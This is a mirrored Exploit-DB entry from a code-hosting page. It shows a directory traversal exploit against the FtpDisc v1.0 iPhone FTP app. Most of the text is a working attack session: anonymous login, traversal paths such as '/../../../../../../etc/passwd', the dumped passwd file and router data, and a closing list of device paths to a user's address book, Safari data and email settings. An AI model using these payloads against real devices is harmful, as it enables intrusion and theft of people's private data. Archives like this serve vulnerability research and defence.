bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ios/remote/16208.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

113 lines
No EOL
4.6 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the FtpDisc.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 documents
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 other
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 photos
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x 1 nobody nobody 0 Aug 3 201012:41 .file
dr-xr-xr-x 1 nobody nobody 1428 Feb 8 12:50 Applications
dr-xr-xr-x 1 nobody nobody 68 Aug 19 2010 4:10 Developer
dr-xr-xr-x 1 nobody nobody 884 Jan 12 12:53 Library
dr-xr-xr-x 1 nobody nobody 102 Aug 19 2010 4:18 System
dr-xr-xr-x 1 nobody nobody 306 Feb 8 11:48 User
dr-xr-xr-x 1 nobody nobody 2074 Jan 13 9:52 bin
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 boot
-r-xr-xr-x 1 nobody nobody 638 Jan 25 15:30 control
dr-xr-xr-x 1 nobody nobody 68 Aug 3 201012:41 cores
1 nobody nobody 68 1 dev
dr-xr-xr-x 1 nobody nobody 918 Jan 26 11:34 etc
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 lib
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 mnt
dr-xr-xr-x 1 nobody nobody 136 Oct 23 201015:12 private
dr-xr-xr-x 1 nobody nobody 1666 Jan 13 9:52 sbin
drwxrwxrwx 1 nobody nobody 272 Feb 22 16:02 tmp
dr-xr-xr-x 1 nobody nobody 374 Jan 13 9:52 usr
dr-xr-xr-x 1 nobody nobody 1088 Oct 26 2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
# IPhone inside information
1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari Favorites List
- /private/var/mobile/Library/Safari
3. Users E-mail Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist
Reference in a new issue View git blame Copy permalink